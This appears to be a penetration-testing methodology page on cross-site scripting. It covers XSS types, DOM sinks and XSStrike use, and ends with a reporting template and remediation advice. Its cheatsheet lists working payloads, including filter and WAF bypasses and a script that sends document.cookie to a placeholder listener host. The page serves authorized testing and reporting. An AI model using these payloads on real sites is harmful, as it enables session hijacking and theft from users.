π‘οΈ Methodology Checklist
- Test reflected XSS:
<script>alert(1)</script>in all URL params and form fields - Stored XSS: submit payload to any field that persists and is viewed by others
- DOM-based: review JS source for
document.write,innerHTML,location.hash - Attribute context:
"><svg onload=alert(1)>or" onmouseover="alert(1) - Filter bypass:
<img src=x onerror=alert(1)>, hex encoding, case variations - Blind XSS: use out-of-band callback (XSSHunter, Burp Collaborator)
- Document injection point, context, and impact for report
π― Operational Context
Use when: Identifying XSS vulnerability type (reflected, stored, DOM-based) and finding injection points in the application.
Think Dumber First: Test every input field and URL parameter with <script>alert(1)</script>. If thatβs filtered, try <img src=x onerror=alert(1)>, <svg onload=alert(1)>. For DOM XSS: check JS source for innerHTML, document.write, eval with user-controlled data.
Skip when: Application uses a modern framework (React, Angular) with proper escaping β DOM XSS still possible via dangerous sinks but harder.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
<script>alert(window.origin)</script> | Basic XSS PoC β confirms execution and identifies iframe context |
<script>print()</script> | Alternative PoC when alert is WAF-blocked |
<plaintext> | Dumps raw page source β confirms HTML injection even if JS blocked |
http://[TARGET_IP]/page.html#<script>alert('DOM_XSS')</script> | DOM XSS via URL hash fragment |
http://[TARGET_IP]:#task=<img src='' onerror=alert(window.origin)> | DOM XSS via innerHTML sink (script tags stripped by innerHTML) |
<img src="" onerror=alert(window.origin)> | innerHTML sink bypass β use event handlers, not <script> |
<svg/onload=alert(1)> | Minimal SVG-based bypass |
"><img src=x onerror=alert(1)> | Break out of HTML attribute context first |
<HtMl%09onPoIntERENTER+=+confirm()> | Obfuscated WAF-bypass payload |
python xsstrike.py -u "http://[TARGET_IP]/index.php?task=test" | Automated XSS scanner |
<script>new Image().src="http://[LHOST]:[LPORT]/log?c="+document.cookie;</script> | Cookie exfiltration PoC |
π¬ Deep Dive & Workflow
XSS Type Matrix
| Type | Persistent? | Server involved? | Trigger |
|---|---|---|---|
| Stored | Yes | Yes | Any visitor loads poisoned page |
| Reflected | No | Yes | Victim clicks crafted URL |
| DOM-based | No | No | URL hash/fragment processed client-side |
Identifying the type:
- Does injecting and navigating away preserve it? β Stored
- Does it only work if you send a link to a victim? β Reflected
- Does nothing appear in Burp HTTP History? β DOM-based (hash
#never sent to server)
Context-Specific Injection Points
<!-- Standard input β default test -->
<script>alert(window.origin)</script>
<!-- Inside HTML attribute: <input value="YOUR_INPUT"> -->
"><img src=x onerror=alert(1)>
<!-- Inside <script> block: var x = 'YOUR_INPUT'; -->
'; alert(1); //
<!-- Inside URL: href="YOUR_INPUT" -->
javascript:alert(1)DOM XSS Source/Sink Analysis
Look in JS files for sources feeding into dangerous sinks:
// Source: reads from URL
var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
// Sink: writes without sanitization (innerHTML strips <script> but runs onerror)
document.getElementById("todo").innerHTML = "<b>Next:</b> " + decodeURIComponent(task);Dangerous sinks: innerHTML, outerHTML, document.write(), document.writeln(), jQuery html(), append(), prepend()
XSStrike (Automated Discovery)
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike && pip install -r requirements.txt
python xsstrike.py -u "http://[TARGET_IP]/index.php?task=test"Key Detection Notes
window.originin alert = confirms domain + distinguishes iframe vs main app- DOM XSS: inspect rendered source (F12 Inspector), not raw source (Ctrl+U)
- Header injection: try XSS in
User-AgentorCookieβ may trigger Stored XSS in admin logs <plaintext>: only confirms HTML injection; if JS filtered but HTML isnβt, still a finding
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| alert() blocked | CSP or filter | Use: confirm(1), prompt(1), console.log(1); or use Burp Collaborator for blind XSS |
| Script tags filtered | Tag-based filter | Try attribute injection: <img src=x onerror=alert(1)>, <body onload=alert(1)>, <details open ontoggle=alert(1)> |
| XSS payload reflected but not executing | HTML entity encoding on output | View source β if <script>, output is encoded; look for unencoded reflection points |
| DOM XSS not obvious | Need to read JS | Search for: innerHTML, outerHTML, document.write, eval, setTimeout with variable input; trace data flow |
| Blind XSS β no immediate feedback | Payload fires asynchronously | Use XSS Hunter or Burp Collaborator to capture blind XSS when admin reviews content |
π Reporting Trigger
Finding Title: Cross-Site Scripting (XSS) Vulnerability Identified Impact: XSS vulnerability allows injecting malicious scripts executed in usersβ browsers, enabling session hijacking, credential phishing, keylogging, and malware distribution through a trusted application domain. Root Cause: User-supplied input reflected in HTTP responses without proper context-aware output encoding. Missing or inadequate Content Security Policy. Recommendation: Implement context-sensitive output encoding for all user input. Apply strict CSP. Use HTTPOnly and Secure cookie flags. Conduct input validation with allowlisting. Deploy automated XSS scanning in CI/CD pipeline.